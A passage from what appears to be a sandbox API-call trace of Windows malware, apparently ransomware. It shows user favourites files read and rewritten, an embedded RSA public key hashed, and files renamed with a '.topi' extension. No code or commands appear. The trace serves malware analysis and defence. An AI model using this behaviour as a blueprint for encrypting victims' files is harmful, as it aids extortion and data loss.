Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.567] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0096.567] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.567] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.567] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0096.567] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0096.567] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0096.567] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.567] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0096.567] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.567] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49b8 [0096.567] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.567] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0096.567] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.567] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.567] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0096.567] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0096.567] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0096.567] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49e8 [0096.567] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0096.567] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0096.567] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0096.567] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a00 [0096.567] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0096.567] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0096.567] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.567] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0096.568] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0096.568] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0096.568] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0096.568] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a60 [0096.568] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0096.568] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a48 [0096.568] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0096.568] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0096.568] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.568] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0096.568] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0096.568] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0096.568] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49b8 | out: hHeap=0x680000) returned 1 [0096.568] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49b8 [0096.568] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.568] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0096.568] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0096.568] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0096.568] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0096.568] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0096.568] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0096.568] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0096.568] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.568] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0096.568] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49b8 | out: hHeap=0x680000) returned 1 [0096.568] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0096.568] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0096.569] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0096.569] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.569] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0096.569] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0096.569] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0096.569] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0096.569] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0096.569] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0096.569] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.569] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.569] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.569] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a60 | out: hHeap=0x680000) returned 1 [0096.569] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.569] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0096.569] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.569] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49e8 | out: hHeap=0x680000) returned 1 [0096.569] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a00 | out: hHeap=0x680000) returned 1 [0096.569] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0096.569] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0096.569] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0096.570] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49a0 | out: hHeap=0x680000) returned 1 [0096.570] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a02a20 | out: hHeap=0x680000) returned 1 [0096.570] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.570] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0096.570] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0096.570] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0096.570] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0096.570] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.570] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.570] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0096.570] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0096.570] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.570] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0096.570] WriteFile (in: hFile=0x6a8, lpBuffer=0x31b3ff8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x31b3ff8*, lpNumberOfBytesWritten=0x9ccfb14*=0x80, lpOverlapped=0x0) returned 1 [0096.570] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3ff8 | out: hHeap=0x680000) returned 1 [0096.570] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.570] WriteFile (in: hFile=0x6a8, lpBuffer=0x99def60*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99def60*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0096.570] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0096.570] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dd88 [0096.571] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0096.571] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0096.571] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0096.571] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0096.571] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dd88 | out: hHeap=0x680000) returned 1 [0096.571] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0096.571] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0096.571] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0096.571] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0096.571] CloseHandle (hObject=0x6a8) returned 1 [0096.574] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ebb8 [0096.574] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8a0) returned 0x31cf750 [0096.574] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ebb8 | out: hHeap=0x680000) returned 1 [0096.574] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url.topi")) returned 1 [0096.575] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.575] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.575] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.576] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3152ab8 | out: hHeap=0x680000) returned 1 [0096.576] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Gallery.url", cAlternateFileName="WINDOW~2.URL")) returned 1 [0096.576] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.576] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa6) returned 0x3152ab8 [0096.576] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.576] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url") returned=".url" [0096.576] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0096.577] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=133) returned 1 [0096.577] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0096.580] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.580] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0096.581] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.581] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.581] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.581] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x85, lpOverlapped=0x0) returned 1 [0096.582] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.582] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0096.582] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.582] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.582] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df1a0) returned 1 [0096.582] CryptCreateHash (in: hProv=0x6df1a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0096.583] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0096.583] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0096.583] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0096.583] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0096.583] GetLastError () returned 0x0 [0096.583] CryptDestroyHash (hHash=0x31c7580) returned 1 [0096.583] CryptReleaseContext (hProv=0x6df1a0, dwFlags=0x0) returned 1 [0096.583] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.583] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0096.583] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0096.583] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.583] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0096.583] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.583] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.583] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b3ff8 [0096.583] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0096.583] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.583] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0096.583] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.583] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0096.583] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0096.583] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02a20 [0096.583] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49a0 [0096.583] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02a68 [0096.584] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a00 [0096.584] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49e8 [0096.584] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0096.584] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a60 [0096.584] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0096.584] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0096.584] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0096.584] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0096.584] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49e8 | out: hHeap=0x680000) returned 1 [0096.584] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a60 | out: hHeap=0x680000) returned 1 [0096.584] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0096.584] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0096.584] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0096.584] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0096.584] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0096.584] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a60 [0096.584] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0096.584] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e49e8 [0096.584] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0096.584] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0096.584] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0096.584] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0096.584] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0096.584] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0096.584] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0096.584] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.584] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.584] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a60 | out: hHeap=0x680000) returned 1 [0096.584] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.584] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49e8 | out: hHeap=0x680000) returned 1 [0096.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0096.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0096.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.585] GetCurrentThreadId () returned 0x8c4 [0096.585] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0096.585] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f8190 [0096.585] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0096.585] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0096.585] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0096.585] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.585] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.585] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0096.585] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.585] GetCurrentThreadId () returned 0x8c4 [0096.585] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.585] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, 